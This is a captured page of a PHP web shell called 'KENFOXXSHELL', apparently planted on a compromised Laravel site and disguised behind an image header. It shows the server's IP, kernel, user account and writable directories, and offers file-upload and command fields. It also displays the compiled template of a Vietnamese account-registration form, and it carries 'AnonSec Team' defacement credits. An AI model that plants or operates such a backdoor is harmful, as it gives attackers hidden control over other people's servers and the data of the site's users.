JFIFHHC     C  " 5????! ??? Donat Was Here
KENFOXXSHELL
Server IP : 160.25.81.117  /  Your IP : 216.73.216.137
Web Server : Apache/2
System : Linux sv05.hilab.cloud 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : bellizen ( 1045)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/bellizen/public_html/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/bellizen/public_html/storage/framework/views/65c0efd78b49757b44e67203c3582063bd6e9f75.php
<?php $__env->startSection('content'); ?>
<section class="login-page">

    <section class="login-content">

        <div class="container">

            <div class="row">

                <div class="col-md-4 offset-md-4">

                    <form class="login-form" name="frm_contact" method="post" action="<?php echo url('dang-ky'); ?>">
                        <input type="hidden" name="_token" value="<?php echo csrf_token(); ?>" />

                        <h4>Đăng ký tài khoản</h4>
                        
                        <?php if(count($errors) > 0): ?>
                            <?php $__currentLoopData = $errors->all(); $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $error): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                            <div class="alert alert-info"><?php echo $error; ?></div>
                            <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                        <?php else: ?>
                            <?php if(session('thongbao')): ?>
                                <div class="alert alert-info"><?php echo e(session('thongbao')); ?></div>
                            <?php endif; ?>
                        <?php endif; ?>
                        <input type="text" class="username" required placeholder="Username" name="username">
                        <input type="text" class="name" required placeholder="Họ và tên" name="name">
                        <input type="text" class="username" required placeholder="Địa chỉ" name="address">

                        <input type="email" class="username" required placeholder="Email đăng nhập" name="email">

                        <input type="text" class="username" required placeholder="SDT đăng ký" name="phone">

                        <div class="form-group input-group">

                            <input type="password" id="password" name="password" class="form-control" required

                                   placeholder="Mật khẩu" autocomplete="off"/>

                            <label class="input-group-addon">

                                <input type="checkbox" style="display:none" onclick="(function(e, el){

                              document.getElementById('password').type = el.checked ? 'text' : 'password';

                              })(event, this)">

                                <span class="i-abs"><i class="fa fa-eye" aria-hidden="true"></i></span>

                            </label>

                        </div>

                        <div class="form-group input-group">

                            <input type="password" id="re-password" name="re-password" class="form-control" required placeholder="Nhập lại mật khẩu" autocomplete="off"/>

                            <label class="input-group-addon">

                                <input type="checkbox" style="display:none" onclick="(function(e, el){

                              document.getElementById('re-password').type = el.checked ? 'text' : 'password';

                              })(event, this)">

                                <span class="i-abs"><i class="fa fa-eye" aria-hidden="true"></i></span>

                            </label>

                        </div>

                        <button name="btnlog" type="submit">Đăng ký</button>

                    </form>

                </div>

            </div>

        </div>

    </section>

</section>

<?php $__env->stopSection(); ?>

<?php echo $__env->make('index', array_except(get_defined_vars(), array('__data', '__path')))->render(); ?>

Anon7 - 2022
AnonSec Team